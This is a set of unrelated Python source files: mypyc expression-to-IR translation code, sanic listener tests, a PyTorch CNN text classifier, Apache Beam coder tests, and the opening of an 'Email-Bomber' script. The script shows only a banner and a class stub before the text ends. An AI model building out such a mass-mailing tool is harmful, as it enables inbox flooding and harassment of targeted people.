return builder.py_call(function, args, expr.line,
arg_kinds=expr.arg_kinds, arg_names=expr.arg_names)
def translate_refexpr_call(builder: IRBuilder, expr: CallExpr, callee: RefExpr) -> Value:
"""Translate a non-method call."""
# Gen the argument values
arg_values = [builder.accept(arg) for arg in expr.args]
return builder.call_refexpr_with_args(expr, callee, arg_values)
def translate_method_call(builder: IRBuilder, expr: CallExpr, callee: MemberExpr) -> Value:
"""Generate IR for an arbitrary call of form e.m(...).
This can also deal with calls to module-level functions.
"""
if builder.is_native_ref_expr(callee):
# Call to module-level native function or such
return translate_call(builder, expr, callee)
elif (
isinstance(callee.expr, RefExpr)
and isinstance(callee.expr.node, TypeInfo)
and callee.expr.node in builder.mapper.type_to_ir
and builder.mapper.type_to_ir[callee.expr.node].has_method(callee.name)
):
# Call a method via the *class*
assert isinstance(callee.expr.node, TypeInfo)
ir = builder.mapper.type_to_ir[callee.expr.node]
decl = ir.method_decl(callee.name)
args = []
arg_kinds, arg_names = expr.arg_kinds[:], expr.arg_names[:]
# Add the class argument for class methods in extension classes
if decl.kind == FUNC_CLASSMETHOD and ir.is_ext_class:
args.append(builder.load_native_type_object(callee.expr.node.fullname))
arg_kinds.insert(0, ARG_POS)
arg_names.insert(0, None)
args += [builder.accept(arg) for arg in expr.args]
if ir.is_ext_class:
return builder.builder.call(decl, args, arg_kinds, arg_names, expr.line)
else:
obj = builder.accept(callee.expr)
return builder.gen_method_call(obj,
callee.name,
args,
builder.node_type(expr),
expr.line,
expr.arg_kinds,
expr.arg_names)
elif builder.is_module_member_expr(callee):
# Fall back to a PyCall for non-native module calls
function = builder.accept(callee)
args = [builder.accept(arg) for arg in expr.args]
return builder.py_call(function, args, expr.line,
arg_kinds=expr.arg_kinds, arg_names=expr.arg_names)
else:
receiver_typ = builder.node_type(callee.expr)
# If there is a specializer for this method name/type, try calling it.
# We would return the first successful one.
val = apply_method_specialization(builder, expr, callee, receiver_typ)
if val is not None:
return val
obj = builder.accept(callee.expr)
args = [builder.accept(arg) for arg in expr.args]
return builder.gen_method_call(obj,
callee.name,
args,
builder.node_type(expr),
expr.line,
expr.arg_kinds,
expr.arg_names)
def translate_super_method_call(builder: IRBuilder, expr: CallExpr, callee: SuperExpr) -> Value:
if callee.info is None or (len(callee.call.args) != 0 and len(callee.call.args) != 2):
return translate_call(builder, expr, callee)
# We support two-argument super but only when it is super(CurrentClass, self)
# TODO: We could support it when it is a parent class in many cases?
if len(callee.call.args) == 2:
self_arg = callee.call.args[1]
if (
not isinstance(self_arg, NameExpr)
or not isinstance(self_arg.node, Var)
or not self_arg.node.is_self
):
return translate_call(builder, expr, callee)
typ_arg = callee.call.args[0]
if (
not isinstance(typ_arg, NameExpr)
or not isinstance(typ_arg.node, TypeInfo)
or callee.info is not typ_arg.node
):
return translate_call(builder, expr, callee)
ir = builder.mapper.type_to_ir[callee.info]
# Search for the method in the mro, skipping ourselves. We
# determine targets of super calls to native methods statically.
for base in ir.mro[1:]:
if callee.name in base.method_decls:
break
else:
if (ir.is_ext_class
and ir.builtin_base is None
and not ir.inherits_python
and callee.name == '__init__'
and len(expr.args) == 0):
# Call translates to object.__init__(self), which is a
# no-op, so omit the call.
return builder.none()
return translate_call(builder, expr, callee)
decl = base.method_decl(callee.name)
arg_values = [builder.accept(arg) for arg in expr.args]
arg_kinds, arg_names = expr.arg_kinds[:], expr.arg_names[:]
if decl.kind != FUNC_STATICMETHOD:
# Grab first argument
vself: Value = builder.self()
if decl.kind == FUNC_CLASSMETHOD:
vself = builder.call_c(type_op, [vself], expr.line)
elif builder.fn_info.is_generator:
# For generator classes, the self target is the 6th value
# in the symbol table (which is an ordered dict). This is sort
# of ugly, but we can't search by name since the 'self' parameter
# could be named anything, and it doesn't get added to the
# environment indexes.
self_targ = list(builder.symtables[-1].values())[6]
vself = builder.read(self_targ, builder.fn_info.fitem.line)
arg_values.insert(0, vself)
arg_kinds.insert(0, ARG_POS)
arg_names.insert(0, None)
return builder.builder.call(decl, arg_values, arg_kinds, arg_names, expr.line)
def translate_cast_expr(builder: IRBuilder, expr: CastExpr) -> Value:
src = builder.accept(expr.expr)
target_type = builder.type_to_rtype(expr.type)
return builder.coerce(src, target_type, expr.line)
# Operators
def transform_unary_expr(builder: IRBuilder, expr: UnaryExpr) -> Value:
folded = try_constant_fold(builder, expr)
if folded:
return folded
return builder.unary_op(builder.accept(expr.expr), expr.op, expr.line)
def transform_op_expr(builder: IRBuilder, expr: OpExpr) -> Value:
if expr.op in ('and', 'or'):
return builder.shortcircuit_expr(expr)
# Special case for string formatting
if expr.op == '%' and (isinstance(expr.left, StrExpr) or isinstance(expr.left, BytesExpr)):
ret = translate_printf_style_formatting(builder, expr.left, expr.right)
if ret is not None:
return ret
folded = try_constant_fold(builder, expr)
if folded:
return folded
return builder.binary_op(
builder.accept(expr.left), builder.accept(expr.right), expr.op, expr.line
)
def transform_index_expr(builder: IRBuilder, expr: IndexExpr) -> Value:
base = builder.accept(expr.base)
index = expr.index
if isinstance(base.type, RTuple) and isinstance(index, IntExpr):
return builder.add(TupleGet(base, index.value, expr.line))
if isinstance(index, SliceExpr):
value = try_gen_slice_op(builder, base, index)
if value:
return value
index_reg = builder.accept(expr.index)
return builder.gen_method_call(
base, '__getitem__', [index_reg], builder.node_type(expr), expr.line)
def try_constant_fold(builder: IRBuilder, expr: Expression) -> Optional[Value]:
"""Return the constant value of an expression if possible.
Return None otherwise.
"""
value = constant_fold_expr(builder, expr)
if isinstance(value, int):
return builder.load_int(value)
elif isinstance(value, str):
return builder.load_str(value)
return None
def try_gen_slice_op(builder: IRBuilder, base: Value, index: SliceExpr) -> Optional[Value]:
"""Generate specialized slice op for some index expressions.
Return None if a specialized op isn't available.
This supports obj[x:y], obj[:x], and obj[x:] for a few types.
"""
if index.stride:
# We can only handle the default stride of 1.
return None
if index.begin_index:
begin_type = builder.node_type(index.begin_index)
else:
begin_type = int_rprimitive
if index.end_index:
end_type = builder.node_type(index.end_index)
else:
end_type = int_rprimitive
# Both begin and end index must be int (or missing).
if is_int_rprimitive(begin_type) and is_int_rprimitive(end_type):
if index.begin_index:
begin = builder.accept(index.begin_index)
else:
begin = builder.load_int(0)
if index.end_index:
end = builder.accept(index.end_index)
else:
# Replace missing end index with the largest short integer
# (a sequence can't be longer).
end = builder.load_int(MAX_SHORT_INT)
candidates = [list_slice_op, tuple_slice_op, str_slice_op, bytes_slice_op]
return builder.builder.matching_call_c(candidates, [base, begin, end], index.line)
return None
def transform_conditional_expr(builder: IRBuilder, expr: ConditionalExpr) -> Value:
if_body, else_body, next_block = BasicBlock(), BasicBlock(), BasicBlock()
builder.process_conditional(expr.cond, if_body, else_body)
expr_type = builder.node_type(expr)
# Having actual Phi nodes would be really nice here!
target = Register(expr_type)
builder.activate_block(if_body)
true_value = builder.accept(expr.if_expr)
true_value = builder.coerce(true_value, expr_type, expr.line)
builder.add(Assign(target, true_value))
builder.goto(next_block)
builder.activate_block(else_body)
false_value = builder.accept(expr.else_expr)
false_value = builder.coerce(false_value, expr_type, expr.line)
builder.add(Assign(target, false_value))
builder.goto(next_block)
builder.activate_block(next_block)
return target
def transform_comparison_expr(builder: IRBuilder, e: ComparisonExpr) -> Value:
# x in (...)/[...]
# x not in (...)/[...]
if (e.operators[0] in ['in', 'not in']
and len(e.operators) == 1
and isinstance(e.operands[1], (TupleExpr, ListExpr))):
items = e.operands[1].items
n_items = len(items)
# x in y -> x == y[0] or ... or x == y[n]
# x not in y -> x != y[0] and ... and x != y[n]
# 16 is arbitrarily chosen to limit code size
if 1 < n_items < 16:
if e.operators[0] == 'in':
bin_op = 'or'
cmp_op = '=='
else:
bin_op = 'and'
cmp_op = '!='
lhs = e.operands[0]
mypy_file = builder.graph['builtins'].tree
assert mypy_file is not None
bool_type = Instance(cast(TypeInfo, mypy_file.names['bool'].node), [])
exprs = []
for item in items:
expr = ComparisonExpr([cmp_op], [lhs, item])
builder.types[expr] = bool_type
exprs.append(expr)
or_expr: Expression = exprs.pop(0)
for expr in exprs:
or_expr = OpExpr(bin_op, or_expr, expr)
builder.types[or_expr] = bool_type
return builder.accept(or_expr)
# x in [y]/(y) -> x == y
# x not in [y]/(y) -> x != y
elif n_items == 1:
if e.operators[0] == 'in':
cmp_op = '=='
else:
cmp_op = '!='
e.operators = [cmp_op]
e.operands[1] = items[0]
# x in []/() -> False
# x not in []/() -> True
elif n_items == 0:
if e.operators[0] == 'in':
return builder.false()
else:
return builder.true()
# TODO: Don't produce an expression when used in conditional context
# All of the trickiness here is due to support for chained conditionals
# (`e1 < e2 > e3`, etc). `e1 < e2 > e3` is approximately equivalent to
# `e1 < e2 and e2 > e3` except that `e2` is only evaluated once.
expr_type = builder.node_type(e)
# go(i, prev) generates code for `ei opi e{i+1} op{i+1} ... en`,
# assuming that prev contains the value of `ei`.
def go(i: int, prev: Value) -> Value:
if i == len(e.operators) - 1:
return transform_basic_comparison(
builder, e.operators[i], prev, builder.accept(e.operands[i + 1]), e.line)
next = builder.accept(e.operands[i + 1])
return builder.builder.shortcircuit_helper(
'and', expr_type,
lambda: transform_basic_comparison(
builder, e.operators[i], prev, next, e.line),
lambda: go(i + 1, next),
e.line)
return go(0, builder.accept(e.operands[0]))
def transform_basic_comparison(builder: IRBuilder,
op: str,
left: Value,
right: Value,
line: int) -> Value:
if (is_int_rprimitive(left.type) and is_int_rprimitive(right.type)
and op in int_comparison_op_mapping.keys()):
return builder.compare_tagged(left, right, op, line)
negate = False
if op == 'is not':
op, negate = 'is', True
elif op == 'not in':
op, negate = 'in', True
target = builder.binary_op(left, right, op, line)
if negate:
target = builder.unary_op(target, 'not', line)
return target
def translate_printf_style_formatting(builder: IRBuilder,
format_expr: Union[StrExpr, BytesExpr],
rhs: Expression) -> Optional[Value]:
tokens = tokenizer_printf_style(format_expr.value)
if tokens is not None:
literals, format_ops = tokens
exprs = []
if isinstance(rhs, TupleExpr):
exprs = rhs.items
elif isinstance(rhs, Expression):
exprs.append(rhs)
if isinstance(format_expr, BytesExpr):
substitutions = convert_format_expr_to_bytes(builder, format_ops,
exprs, format_expr.line)
if substitutions is not None:
return join_formatted_bytes(builder, literals, substitutions, format_expr.line)
else:
substitutions = convert_format_expr_to_str(builder, format_ops,
exprs, format_expr.line)
if substitutions is not None:
return join_formatted_strings(builder, literals, substitutions, format_expr.line)
return None
# Literals
def transform_int_expr(builder: IRBuilder, expr: IntExpr) -> Value:
return builder.builder.load_int(expr.value)
def transform_float_expr(builder: IRBuilder, expr: FloatExpr) -> Value:
return builder.builder.load_float(expr.value)
def transform_complex_expr(builder: IRBuilder, expr: ComplexExpr) -> Value:
return builder.builder.load_complex(expr.value)
def transform_str_expr(builder: IRBuilder, expr: StrExpr) -> Value:
return builder.load_str(expr.value)
def transform_bytes_expr(builder: IRBuilder, expr: BytesExpr) -> Value:
return builder.load_bytes_from_str_literal(expr.value)
def transform_ellipsis(builder: IRBuilder, o: EllipsisExpr) -> Value:
return builder.add(LoadAddress(ellipsis_op.type, ellipsis_op.src, o.line))
# Display expressions
def transform_list_expr(builder: IRBuilder, expr: ListExpr) -> Value:
return _visit_list_display(builder, expr.items, expr.line)
def _visit_list_display(builder: IRBuilder, items: List[Expression], line: int) -> Value:
return _visit_display(
builder,
items,
builder.new_list_op,
list_append_op,
list_extend_op,
line,
True
)
def transform_tuple_expr(builder: IRBuilder, expr: TupleExpr) -> Value:
if any(isinstance(item, StarExpr) for item in expr.items):
# create a tuple of unknown length
return _visit_tuple_display(builder, expr)
# create a tuple of fixed length (RTuple)
tuple_type = builder.node_type(expr)
# When handling NamedTuple et. al we might not have proper type info,
# so make some up if we need it.
types = (tuple_type.types if isinstance(tuple_type, RTuple)
else [object_rprimitive] * len(expr.items))
items = []
for item_expr, item_type in zip(expr.items, types):
reg = builder.accept(item_expr)
items.append(builder.coerce(reg, item_type, item_expr.line))
return builder.add(TupleSet(items, expr.line))
def _visit_tuple_display(builder: IRBuilder, expr: TupleExpr) -> Value:
"""Create a list, then turn it into a tuple."""
val_as_list = _visit_list_display(builder, expr.items, expr.line)
return builder.call_c(list_tuple_op, [val_as_list], expr.line)
def transform_dict_expr(builder: IRBuilder, expr: DictExpr) -> Value:
"""First accepts all keys and values, then makes a dict out of them."""
key_value_pairs = []
for key_expr, value_expr in expr.items:
key = builder.accept(key_expr) if key_expr is not None else None
value = builder.accept(value_expr)
key_value_pairs.append((key, value))
return builder.builder.make_dict(key_value_pairs, expr.line)
def transform_set_expr(builder: IRBuilder, expr: SetExpr) -> Value:
return _visit_display(
builder,
expr.items,
builder.new_set_op,
set_add_op,
set_update_op,
expr.line,
False
)
def _visit_display(builder: IRBuilder,
items: List[Expression],
constructor_op: Callable[[List[Value], int], Value],
append_op: CFunctionDescription,
extend_op: CFunctionDescription,
line: int,
is_list: bool
) -> Value:
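    # Evaluate all items first; for lists, the leading non-starred items seed the
    # constructor and the remaining items are added via append/extend calls.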
accepted_items = []
for item in items:
if isinstance(item, StarExpr):
accepted_items.append((True, builder.accept(item.expr)))
else:
accepted_items.append((False, builder.accept(item)))
result: Union[Value, None] = None
initial_items = []
for starred, value in accepted_items:
if result is None and not starred and is_list:
initial_items.append(value)
continue
if result is None:
result = constructor_op(initial_items, line)
builder.call_c(extend_op if starred else append_op, [result, value], line)
if result is None:
result = constructor_op(initial_items, line)
return result
# Comprehensions
def transform_list_comprehension(builder: IRBuilder, o: ListComprehension) -> Value:
if any(o.generator.is_async):
builder.error('async comprehensions are unimplemented', o.line)
return translate_list_comprehension(builder, o.generator)
def transform_set_comprehension(builder: IRBuilder, o: SetComprehension) -> Value:
if any(o.generator.is_async):
builder.error('async comprehensions are unimplemented', o.line)
return translate_set_comprehension(builder, o.generator)
def transform_dictionary_comprehension(builder: IRBuilder, o: DictionaryComprehension) -> Value:
if any(o.is_async):
builder.error('async comprehensions are unimplemented', o.line)
d = builder.call_c(dict_new_op, [], o.line)
loop_params = list(zip(o.indices, o.sequences, o.condlists))
def gen_inner_stmts() -> None:
k = builder.accept(o.key)
v = builder.accept(o.value)
builder.call_c(dict_set_item_op, [d, k, v], o.line)
comprehension_helper(builder, loop_params, gen_inner_stmts, o.line)
return d
# Misc
def transform_slice_expr(builder: IRBuilder, expr: SliceExpr) -> Value:
def get_arg(arg: Optional[Expression]) -> Value:
if arg is None:
return builder.none_object()
else:
return builder.accept(arg)
args = [get_arg(expr.begin_index),
get_arg(expr.end_index),
get_arg(expr.stride)]
return builder.call_c(new_slice_op, args, expr.line)
def transform_generator_expr(builder: IRBuilder, o: GeneratorExpr) -> Value:
if any(o.is_async):
builder.error('async comprehensions are unimplemented', o.line)
builder.warning('Treating generator comprehension as list', o.line)
return builder.call_c(
iter_op, [translate_list_comprehension(builder, o)], o.line
)
def transform_assignment_expr(builder: IRBuilder, o: AssignmentExpr) -> Value:
value = builder.accept(o.value)
target = builder.get_assignment_target(o.target)
builder.assign(target, value, o.line)
return value
|
the-stack_0_25926
|
import asyncio
import signal
import pytest
from sanic.testing import HOST, PORT
AVAILABLE_LISTENERS = [
"before_server_start",
"after_server_start",
"before_server_stop",
"after_server_stop",
]
skipif_no_alarm = pytest.mark.skipif(
not hasattr(signal, "SIGALRM"),
reason="SIGALRM is not implemented for this platform, we have to come "
"up with another timeout strategy to test these",
)
def create_listener(listener_name, in_list):
async def _listener(app, loop):
print("DEBUG MESSAGE FOR PYTEST for {}".format(listener_name))
in_list.insert(0, app.name + listener_name)
return _listener
def start_stop_app(random_name_app, **run_kwargs):
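    # Run the app and stop it after ~1 second: SIGALRM raises KeyboardInterrupt,
    # which breaks out of app.run() and is swallowed below.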
def stop_on_alarm(signum, frame):
raise KeyboardInterrupt("SIGINT for sanic to stop gracefully")
signal.signal(signal.SIGALRM, stop_on_alarm)
signal.alarm(1)
try:
random_name_app.run(HOST, PORT, **run_kwargs)
except KeyboardInterrupt:
pass
@skipif_no_alarm
@pytest.mark.parametrize("listener_name", AVAILABLE_LISTENERS)
def test_single_listener(app, listener_name):
"""Test that listeners on their own work"""
output = []
# Register listener
app.listener(listener_name)(create_listener(listener_name, output))
start_stop_app(app)
assert app.name + listener_name == output.pop()
@skipif_no_alarm
@pytest.mark.parametrize("listener_name", AVAILABLE_LISTENERS)
def test_register_listener(app, listener_name):
"""
Test that listeners on their own work with
app.register_listener method
"""
output = []
# Register listener
listener = create_listener(listener_name, output)
app.register_listener(listener, event=listener_name)
start_stop_app(app)
assert app.name + listener_name == output.pop()
@skipif_no_alarm
def test_all_listeners(app):
output = []
for listener_name in AVAILABLE_LISTENERS:
listener = create_listener(listener_name, output)
app.listener(listener_name)(listener)
start_stop_app(app)
for listener_name in AVAILABLE_LISTENERS:
assert app.name + listener_name == output.pop()
@pytest.mark.asyncio
async def test_trigger_before_events_create_server(app):
class MySanicDb:
pass
@app.listener("before_server_start")
async def init_db(app, loop):
app.db = MySanicDb()
await app.create_server(debug=True, return_asyncio_server=True, port=PORT)
assert hasattr(app, "db")
assert isinstance(app.db, MySanicDb)
def test_create_server_trigger_events(app):
"""Test if create_server can trigger server events"""
flag1 = False
flag2 = False
flag3 = False
async def stop(app, loop):
nonlocal flag1
flag1 = True
await asyncio.sleep(0.1)
app.stop()
async def before_stop(app, loop):
nonlocal flag2
flag2 = True
async def after_stop(app, loop):
nonlocal flag3
flag3 = True
app.listener("after_server_start")(stop)
app.listener("before_server_stop")(before_stop)
app.listener("after_server_stop")(after_stop)
loop = asyncio.get_event_loop()
serv_coro = app.create_server(return_asyncio_server=True)
serv_task = asyncio.ensure_future(serv_coro, loop=loop)
server = loop.run_until_complete(serv_task)
server.after_start()
try:
loop.run_forever()
except KeyboardInterrupt as e:
loop.stop()
finally:
# Run the on_stop function if provided
server.before_stop()
# Wait for server to close
close_task = server.close()
loop.run_until_complete(close_task)
# Complete all tasks on the loop
signal.stopped = True
for connection in server.connections:
connection.close_if_idle()
server.after_stop()
assert flag1 and flag2 and flag3
|
the-stack_0_25927
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
import random
import hyperparams
torch.manual_seed(hyperparams.seed_num)
random.seed(hyperparams.seed_num)
class CNN_Text(nn.Module):
def __init__(self, args):
super(CNN_Text,self).__init__()
self.args = args
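        # V: vocab size, D: embedding dim, C: number of classes,
        # Ci: input channels, Co: kernels per size, Ks: list of kernel heights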
V = args.embed_num
D = args.embed_dim
C = args.class_num
Ci = 1
Co = args.kernel_num
Ks = args.kernel_sizes
self.embed = nn.Embedding(V, D)
# print("aaaaaaaa", self.embed.weight)
pretrained_weight = np.array(args.pretrained_weight)
self.embed.weight.data.copy_(torch.from_numpy(pretrained_weight))
# print("bbbbbbbb", self.embed.weight)
        # Use nn.ModuleList so the conv layers are registered as submodules;
        # a plain Python list would hide their parameters from the optimizer.
        self.convs1 = nn.ModuleList([nn.Conv2d(Ci, Co, (K, D)) for K in Ks])
'''
self.conv13 = nn.Conv2d(Ci, Co, (3, D))
self.conv14 = nn.Conv2d(Ci, Co, (4, D))
self.conv15 = nn.Conv2d(Ci, Co, (5, D))
'''
self.dropout = nn.Dropout(args.dropout)
self.fc1 = nn.Linear(len(Ks)*Co, C)
def conv_and_pool(self, x, conv):
x = F.relu(conv(x)).squeeze(3) #(N,Co,W)
x = F.max_pool1d(x, x.size(2)).squeeze(2)
return x
def forward(self, x):
# print("aa", x)
x = self.embed(x) # (N,W,D)
# print("embed", x)
if self.args.static:
x = Variable(x.data)
# print("var", x)
x = x.unsqueeze(1) # (N,Ci,W,D)
x = [F.relu(conv(x)).squeeze(3) for conv in self.convs1] #[(N,Co,W), ...]*len(Ks)
x = [F.max_pool1d(i, i.size(2)).squeeze(2) for i in x] #[(N,Co), ...]*len(Ks)
x = torch.cat(x, 1)
'''
x1 = self.conv_and_pool(x,self.conv13) #(N,Co)
x2 = self.conv_and_pool(x,self.conv14) #(N,Co)
x3 = self.conv_and_pool(x,self.conv15) #(N,Co)
x = torch.cat((x1, x2, x3), 1) # (N,len(Ks)*Co)
'''
x = self.dropout(x) # (N,len(Ks)*Co)
logit = self.fc1(x) # (N,C)
return logit
|
the-stack_0_25928
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Unit tests for coders that must be consistent across all Beam SDKs.
"""
# pytype: skip-file
import json
import logging
import math
import os.path
import sys
import unittest
from copy import deepcopy
from typing import Dict
from typing import Tuple
import yaml
from apache_beam.coders import coder_impl
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import schema_pb2
from apache_beam.runners import pipeline_context
from apache_beam.transforms import userstate
from apache_beam.transforms import window
from apache_beam.transforms.window import IntervalWindow
from apache_beam.typehints import schemas
from apache_beam.utils import windowed_value
from apache_beam.utils.sharded_key import ShardedKey
from apache_beam.utils.timestamp import Timestamp
from apache_beam.utils.windowed_value import PaneInfo
from apache_beam.utils.windowed_value import PaneInfoTiming
STANDARD_CODERS_YAML = os.path.normpath(
os.path.join(
os.path.dirname(__file__), '../portability/api/standard_coders.yaml'))
def _load_test_cases(test_yaml):
"""Load test data from yaml file and return an iterable of test cases.
See ``standard_coders.yaml`` for more details.
"""
if not os.path.exists(test_yaml):
raise ValueError('Could not find the test spec: %s' % test_yaml)
with open(test_yaml, 'rb') as coder_spec:
for ix, spec in enumerate(
yaml.load_all(coder_spec, Loader=yaml.SafeLoader)):
spec['index'] = ix
name = spec.get('name', spec['coder']['urn'].split(':')[-2])
yield [name, spec]
def parse_float(s):
x = float(s)
if math.isnan(x):
# In Windows, float('NaN') has opposite sign from other platforms.
# For the purpose of this test, we just need consistency.
x = abs(x)
return x
def value_parser_from_schema(schema):
def attribute_parser_from_type(type_):
parser = nonnull_attribute_parser_from_type(type_)
if type_.nullable:
return lambda x: None if x is None else parser(x)
else:
return parser
def nonnull_attribute_parser_from_type(type_):
# TODO: This should be exhaustive
type_info = type_.WhichOneof("type_info")
if type_info == "atomic_type":
if type_.atomic_type == schema_pb2.BYTES:
return lambda x: x.encode("utf-8")
else:
return schemas.ATOMIC_TYPE_TO_PRIMITIVE[type_.atomic_type]
elif type_info == "array_type":
element_parser = attribute_parser_from_type(type_.array_type.element_type)
return lambda x: list(map(element_parser, x))
elif type_info == "map_type":
key_parser = attribute_parser_from_type(type_.map_type.key_type)
value_parser = attribute_parser_from_type(type_.map_type.value_type)
return lambda x: dict(
(key_parser(k), value_parser(v)) for k, v in x.items())
elif type_info == "row_type":
return value_parser_from_schema(type_.row_type.schema)
elif type_info == "logical_type":
# In YAML logical types are represented with their representation types.
to_language_type = schemas.LogicalType.from_runner_api(
type_.logical_type).to_language_type
parse_representation = attribute_parser_from_type(
type_.logical_type.representation)
return lambda x: to_language_type(parse_representation(x))
parsers = [(field.name, attribute_parser_from_type(field.type))
for field in schema.fields]
constructor = schemas.named_tuple_from_schema(schema)
def value_parser(x):
result = []
x = deepcopy(x)
for name, parser in parsers:
value = x.pop(name)
result.append(None if value is None else parser(value))
if len(x):
raise ValueError(
"Test data contains attributes that don't exist in the schema: {}".
format(', '.join(x.keys())))
return constructor(*result)
return value_parser
class StandardCodersTest(unittest.TestCase):
_urn_to_json_value_parser = {
'beam:coder:bytes:v1': lambda x: x.encode('utf-8'),
'beam:coder:bool:v1': lambda x: x,
'beam:coder:string_utf8:v1': lambda x: x,
'beam:coder:varint:v1': lambda x: x,
'beam:coder:kv:v1': lambda x,
key_parser,
value_parser: (key_parser(x['key']), value_parser(x['value'])),
'beam:coder:interval_window:v1': lambda x: IntervalWindow(
start=Timestamp(micros=(x['end'] - x['span']) * 1000),
end=Timestamp(micros=x['end'] * 1000)),
'beam:coder:iterable:v1': lambda x,
parser: list(map(parser, x)),
'beam:coder:global_window:v1': lambda x: window.GlobalWindow(),
'beam:coder:windowed_value:v1': lambda x,
value_parser,
window_parser: windowed_value.create(
value_parser(x['value']),
x['timestamp'] * 1000,
tuple([window_parser(w) for w in x['windows']])),
'beam:coder:param_windowed_value:v1': lambda x,
value_parser,
window_parser: windowed_value.create(
value_parser(x['value']),
x['timestamp'] * 1000,
tuple([window_parser(w) for w in x['windows']]),
PaneInfo(
x['pane']['is_first'],
x['pane']['is_last'],
PaneInfoTiming.from_string(x['pane']['timing']),
x['pane']['index'],
x['pane']['on_time_index'])),
'beam:coder:timer:v1': lambda x,
value_parser,
window_parser: userstate.Timer(
user_key=value_parser(x['userKey']),
dynamic_timer_tag=x['dynamicTimerTag'],
clear_bit=x['clearBit'],
windows=tuple([window_parser(w) for w in x['windows']]),
fire_timestamp=None,
hold_timestamp=None,
paneinfo=None) if x['clearBit'] else userstate.Timer(
user_key=value_parser(x['userKey']),
dynamic_timer_tag=x['dynamicTimerTag'],
clear_bit=x['clearBit'],
fire_timestamp=Timestamp(micros=x['fireTimestamp'] * 1000),
hold_timestamp=Timestamp(micros=x['holdTimestamp'] * 1000),
windows=tuple([window_parser(w) for w in x['windows']]),
paneinfo=PaneInfo(
x['pane']['is_first'],
x['pane']['is_last'],
PaneInfoTiming.from_string(x['pane']['timing']),
x['pane']['index'],
x['pane']['on_time_index'])),
'beam:coder:double:v1': parse_float,
'beam:coder:sharded_key:v1': lambda x,
value_parser: ShardedKey(
key=value_parser(x['key']), shard_id=x['shardId'].encode('utf-8'))
}
def test_standard_coders(self):
for name, spec in _load_test_cases(STANDARD_CODERS_YAML):
logging.info('Executing %s test.', name)
self._run_standard_coder(name, spec)
def _run_standard_coder(self, name, spec):
def assert_equal(actual, expected):
"""Handle nan values which self.assertEqual fails on."""
if (isinstance(actual, float) and isinstance(expected, float) and
math.isnan(actual) and math.isnan(expected)):
return
self.assertEqual(actual, expected)
coder = self.parse_coder(spec['coder'])
parse_value = self.json_value_parser(spec['coder'])
nested_list = [spec['nested']] if 'nested' in spec else [True, False]
for nested in nested_list:
for expected_encoded, json_value in spec['examples'].items():
value = parse_value(json_value)
expected_encoded = expected_encoded.encode('latin1')
if not spec['coder'].get('non_deterministic', False):
actual_encoded = encode_nested(coder, value, nested)
if self.fix and actual_encoded != expected_encoded:
self.to_fix[spec['index'], expected_encoded] = actual_encoded
else:
self.assertEqual(expected_encoded, actual_encoded)
decoded = decode_nested(coder, expected_encoded, nested)
assert_equal(decoded, value)
else:
# Only verify decoding for a non-deterministic coder
self.assertEqual(
decode_nested(coder, expected_encoded, nested), value)
def parse_coder(self, spec):
context = pipeline_context.PipelineContext()
coder_id = str(hash(str(spec)))
component_ids = [
context.coders.get_id(self.parse_coder(c))
for c in spec.get('components', ())
]
context.coders.put_proto(
coder_id,
beam_runner_api_pb2.Coder(
spec=beam_runner_api_pb2.FunctionSpec(
urn=spec['urn'],
payload=spec.get('payload', '').encode('latin1')),
component_coder_ids=component_ids))
return context.coders.get_by_id(coder_id)
def json_value_parser(self, coder_spec):
# TODO: integrate this with the logic for the other parsers
if coder_spec['urn'] == 'beam:coder:row:v1':
schema = schema_pb2.Schema.FromString(
coder_spec['payload'].encode('latin1'))
return value_parser_from_schema(schema)
component_parsers = [
self.json_value_parser(c) for c in coder_spec.get('components', ())
]
return lambda x: self._urn_to_json_value_parser[coder_spec['urn']](
x, *component_parsers)
# Used when --fix is passed.
fix = False
to_fix = {} # type: Dict[Tuple[int, bytes], bytes]
@classmethod
def tearDownClass(cls):
if cls.fix and cls.to_fix:
print("FIXING", len(cls.to_fix), "TESTS")
doc_sep = '\n---\n'
docs = open(STANDARD_CODERS_YAML).read().split(doc_sep)
def quote(s):
return json.dumps(s.decode('latin1')).replace(r'\u0000', r'\0')
for (doc_ix, expected_encoded), actual_encoded in cls.to_fix.items():
print(quote(expected_encoded), "->", quote(actual_encoded))
docs[doc_ix] = docs[doc_ix].replace(
quote(expected_encoded) + ':', quote(actual_encoded) + ':')
open(STANDARD_CODERS_YAML, 'w').write(doc_sep.join(docs))
def encode_nested(coder, value, nested=True):
out = coder_impl.create_OutputStream()
coder.get_impl().encode_to_stream(value, out, nested)
return out.get()
def decode_nested(coder, encoded, nested=True):
return coder.get_impl().decode_from_stream(
coder_impl.create_InputStream(encoded), nested)
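# A minimal round-trip sketch (illustrative, not part of the upstream test
# suite): the nested encode/decode helpers above work with any Beam coder,
# for example the standard VarIntCoder.
def _roundtrip_example():
    from apache_beam.coders import VarIntCoder
    coder = VarIntCoder()
    encoded = encode_nested(coder, 42)
    assert decode_nested(coder, encoded) == 42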
if __name__ == '__main__':
if '--fix' in sys.argv:
StandardCodersTest.fix = True
sys.argv.remove('--fix')
unittest.main()
|
the-stack_0_25929
|
import smtplib
import sys
class bColors:
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BLUE = '\033[94m'
def banner():
print(bColors.YELLOW + '<<< Email-Bomber >>>')
# print(bColors.YELLOW + '<<< made with pyCharm >>>')
print(bColors.YELLOW + r'''
_
| |
| |___
| _ \ _ _
| |_) | | (_) |
\____/ \__, |
__/ |
|___/
_ _
| | (_)
____ ____ ___| | ___ _ ______ ______ ___ _ ______ ______ _ _ ____
/ ___\ / \ / _ | / _ | | / _____| / _____| / _ | | / _____| / _____| | | | | | \
| |____ | () | | (_| | | (_|| | \______\ \______\ | (_|| | \______\ \______\ | | | | | |
\____/ \____/ \____/ \___|_| |______/ |______/ \___|_| |______/ |______/ |_| |_| |_|
''')
class EmailBomber:
count = 0
def __init__(self):
self.amount = None
try:
